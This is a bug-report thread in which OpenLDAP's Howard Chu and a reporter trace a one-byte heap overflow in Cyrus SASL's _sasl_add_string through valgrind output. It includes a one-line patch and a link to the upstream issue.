Stephan Zeisberg wrote: > Hi Howard — > > Thanks for the quick reply. Will forward the report upstream to Cyrus SASL. For reference, this fixes the bug: vielle:/home/software/cyrus-sasl> git diff diff --git a/lib/common.c b/lib/common.c index bc3bf1df..9969d6aa 100644 --- a/lib/common.c +++ b/lib/common.c @@ -190,7 +190,7 @@ int _sasl_add_string(char **out, size_t *alloclen, if (add==NULL) add = "(null)"; - addlen=strlen(add); /* only compute once */ + addlen=strlen(add)+1; /* only compute once */ if (_buf_alloc(out, alloclen, (*outlen)+addlen)!=SASL_OK) return SASL_NOMEM; Git history shows this bug has existed since the code was originally written in ommit 061698456069833e244d66ce33c8f82c2cd63ce3 Author: Rob Siemborski <rjs3@andrew.cmu.edu> Date: Tue Dec 4 01:59:43 2001 +0000 > > Best > > -Stephan > > On 11/28/19 3:54 PM, Howard Chu wrote: >> Resending with the non-printable chars omitted: >> >> Howard Chu wrote: >>> Thanks, but your trace clearly shows that this is a fault in Cyrus SASL, you should be reporting >>> this issue to them. >>> >>> valgrind confirms it as well: >>> >>> 5ddfddde do_bind: dn () SASL mech <garbage> >>> 5ddfddde ==> sasl_bind: dn="" mech=<garbage> >>> datalen=0 >>> ==11019== Thread 3: >>> ==11019== Invalid write of size 1 >>> ==11019== at 0x4B9B1DB: sasl_seterror (seterror.c:247) >>> ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) >>> ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) >>> ==11019== by 0x21E130: fe_op_bind (bind.c:279) >>> ==11019== by 0x21DCE1: do_bind (bind.c:205) >>> ==11019== by 0x1F35BA: connection_operation (connection.c:1185) >>> ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) >>> ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) >>> ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) >>> ==11019== by 0x4EFA322: clone (clone.S:95) >>> ==11019== Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd >>> ==11019== at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) >>> ==11019== by 0x4B930A4: _buf_alloc (common.c:2186) >>> ==11019== by 0x4B93299: _sasl_add_string (common.c:196) >>> ==11019== by 0x4B9B2D4: sasl_seterror (seterror.c:187) >>> ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) >>> ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) >>> ==11019== by 0x21E130: fe_op_bind (bind.c:279) >>> ==11019== by 0x21DCE1: do_bind (bind.c:205) >>> ==11019== by 0x1F35BA: connection_operation (connection.c:1185) >>> ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) >>> ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) >>> ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) >>> ==11019== >>> ==11019== Invalid read of size 1 >>> ==11019== at 0x483DF54: strlen (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) >>> ==11019== by 0x4E53DE4: __vfprintf_internal (vfprintf-internal.c:1688) >>> ==11019== by 0x4E67029: __vsnprintf_internal (vsnprintf.c:114) >>> ==11019== by 0x3A1FFA: lutil_debug (debug.c:74) >>> ==11019== by 0x266FF3: slap_sasl_log (sasl.c:146) >>> ==11019== by 0x4B9B4CF: sasl_seterror (seterror.c:260) >>> ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) >>> ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) >>> ==11019== by 0x21E130: fe_op_bind (bind.c:279) >>> ==11019== by 0x21DCE1: do_bind (bind.c:205) >>> ==11019== by 0x1F35BA: connection_operation (connection.c:1185) >>> ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) >>> ==11019== Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd >>> ==11019== at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) >>> ==11019== by 0x4B930A4: _buf_alloc (common.c:2186) >>> ==11019== by 0x4B93299: _sasl_add_string (common.c:196) >>> ==11019== by 0x4B9B2D4: sasl_seterror (seterror.c:187) >>> ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) >>> ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) >>> ==11019== by 0x21E130: fe_op_bind (bind.c:279) >>> ==11019== by 0x21DCE1: do_bind (bind.c:205) >>> ==11019== by 0x1F35BA: connection_operation (connection.c:1185) >>> ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) >>> ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) >>> ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) >>> >>> >>> >>> >> > -- -- Howard Chu CTO, Symas Corp. http://www.symas.com Director, Highland Sun http://highlandsun.com/hyc/ Chief Architect, OpenLDAP http://www.openldap.org/project/
Created an issue upstream [1] and included the valgrind output and proposed patch. [1] https://github.com/cyrusimap/cyrus-sasl/issues/587 -Stephan On 11/28/19 4:16 PM, Howard Chu wrote: > 5ddfddde do_bind: dn () SASL mech <garbage> > 5ddfddde ==> sasl_bind: dn="" mech=<garbage> > datalen=0 > ==11019== Thread 3: > ==11019== Invalid write of size 1 > ==11019== at 0x4B9B1DB: sasl_seterror (seterror.c:247) > ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) > ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) > ==11019== by 0x21E130: fe_op_bind (bind.c:279) > ==11019== by 0x21DCE1: do_bind (bind.c:205) > ==11019== by 0x1F35BA: connection_operation (connection.c:1185) > ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) > ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) > ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) > ==11019== by 0x4EFA322: clone (clone.S:95) > ==11019== Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd > ==11019== at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) > ==11019== by 0x4B930A4: _buf_alloc (common.c:2186) > ==11019== by 0x4B93299: _sasl_add_string (common.c:196) > ==11019== by 0x4B9B2D4: sasl_seterror (seterror.c:187) > ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) > ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) > ==11019== by 0x21E130: fe_op_bind (bind.c:279) > ==11019== by 0x21DCE1: do_bind (bind.c:205) > ==11019== by 0x1F35BA: connection_operation (connection.c:1185) > ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) > ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) > ==11019== by 0x4DBE668: start_thread (pthread_create.c:479) > ==11019== > ==11019== Invalid read of size 1 > ==11019== at 0x483DF54: strlen (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) > ==11019== by 0x4E53DE4: __vfprintf_internal (vfprintf-internal.c:1688) > ==11019== by 0x4E67029: __vsnprintf_internal (vsnprintf.c:114) > ==11019== by 0x3A1FFA: lutil_debug (debug.c:74) > ==11019== by 0x266FF3: slap_sasl_log (sasl.c:146) > ==11019== by 0x4B9B4CF: sasl_seterror (seterror.c:260) > ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) > ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) > ==11019== by 0x21E130: fe_op_bind (bind.c:279) > ==11019== by 0x21DCE1: do_bind (bind.c:205) > ==11019== by 0x1F35BA: connection_operation (connection.c:1185) > ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) > ==11019== Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd > ==11019== at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) > ==11019== by 0x4B930A4: _buf_alloc (common.c:2186) > ==11019== by 0x4B93299: _sasl_add_string (common.c:196) > ==11019== by 0x4B9B2D4: sasl_seterror (seterror.c:187) > ==11019== by 0x4B9A18D: sasl_server_start (server.c:1418) > ==11019== by 0x26B88B: slap_sasl_bind (sasl.c:1666) > ==11019== by 0x21E130: fe_op_bind (bind.c:279) > ==11019== by 0x21DCE1: do_bind (bind.c:205) > ==11019== by 0x1F35BA: connection_operation (connection.c:1185) > ==11019== by 0x1F3CE7: connection_read_thread (connection.c:1342) > ==11019== by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048) > ==11019== by 0x4DBE668: start_thread (pthread_create.c:479)
not an openldap bug, fixed in cyrus-sasl upstream